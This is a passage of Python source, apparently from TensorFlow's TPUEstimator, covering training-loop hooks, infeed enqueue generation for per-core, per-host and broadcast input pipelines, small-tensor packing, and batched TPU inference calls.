"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx, features, labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(
'Missing or extra enqueue_data for host {}. len(enqueue_data) = {}.'
.format(host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, ops.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (array_ops.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = array_ops.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
